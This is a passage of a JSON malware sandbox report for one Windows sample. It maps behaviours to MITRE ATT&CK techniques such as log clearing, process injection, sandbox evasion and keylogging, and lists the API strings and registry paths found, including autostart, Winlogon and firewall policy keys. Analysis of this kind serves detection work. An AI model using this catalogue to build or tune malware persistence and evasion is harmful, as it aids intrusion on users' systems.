"attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Clear Windows Event Logs", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "malicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"DCC error: CreateFile() failed\" (Indicator: \"CreateFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"DCC error: CreateFile() failed\" (Indicator: \"CreateFile\"; Source: \"00000000-00005224.00000000.139255.0041B000.00000080.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Connect\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Internet Explorer\\TypedURLs\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Internet Explorer\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Kazaa\\UserDetails\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\n \"Software\\Microsoft\\Connect\" in Source: 00000000-00005224.00000000.139255.0041A000.00000040.mdmp\n \"Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\\TypedURLs\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Kazaa\\UserDetails\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" in Source: 00000000-00005224.00000000.139255.0041B000.00000080.mdmp\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 00000000-00005224.00000000.139261.00423000.00000040.mdmp\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 00000000-00005224.00000000.139261.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 00000000-00005224.00000000.139261.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 00000000-00005224.00000000.139261.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 00000000-00005224.00000000.139261.00423000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 00000000-00005224.00000000.139261.00423000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenProcessToken\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetUserNameA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CloseEventLog\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenEventLogA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ControlService\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"DeleteService\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"OpenServiceA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"EnumDependentServicesA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SetHandleCount\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"LCMapStringA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API (Indicator: \"SetFileTime\"; File: 